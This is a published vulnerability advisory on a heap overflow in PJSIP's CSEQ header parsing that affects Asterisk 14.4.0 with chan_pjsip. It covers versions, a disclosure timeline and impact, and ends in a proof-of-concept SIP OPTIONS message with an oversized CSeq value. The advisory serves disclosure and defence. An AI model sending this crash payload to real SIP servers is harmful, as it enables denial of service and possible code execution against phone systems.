Asterisk 14.4.0 PJSIP 2.6 Heap Overflow

Posted May 22, 2017
Authored by Sandro Gauci, Alfred Farrugia

Asterisk version 14.4.0 with PJSIP version 2.6 suffers from a heap overflow vulnerability in CSEQ header parsing.

tags | exploit, overflow
SHA-256 | 96d2411683190b99bf76dad788720f5b886c567643bf4124f892badaecf39a31

# Heap overflow in CSEQ header parsing affects Asterisk chan_pjsip and PJSIP

- Authors:
  - Alfred Farrugia <alfred@enablesecurity.com>
  - Sandro Gauci <sandro@enablesecurity.com>
- Vulnerable version: Asterisk 14.4.0 running `chan_pjsip`, PJSIP 2.6
- References: AST-2017-002
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2017-01-asterisk-pjsip-cseq-overflow>
- Vendor Advisory: <https://downloads.asterisk.org/pub/security/AST-2017-002.html>
- Timeline:
  - Report date: 2017-04-12
  - Digium confirmed issue: 2017-04-12
  - Digium patch and advisory: 2017-05-19
  - PJSIP added patch by Digium: 2017-05-21
  - Enable Security advisory: 2017-05-23

## Description

A specially crafted SIP message with a long CSEQ value will cause a heap
overflow in PJSIP.

## Impact

Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use. This vulnerability is likely to be abused for
remote code execution and may affect other code that makes use of PJSIP.

## How to reproduce the issue

We made use of the following SIP message which was sent to Asterisk over
UDP to reproduce the issue:

```
OPTIONS sip:localhost:5060 SIP/2.0
From: <sip:test@localhost>
To: <sip:test2@localhost>
Call-ID: aa@0000000000
CSeq: 0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA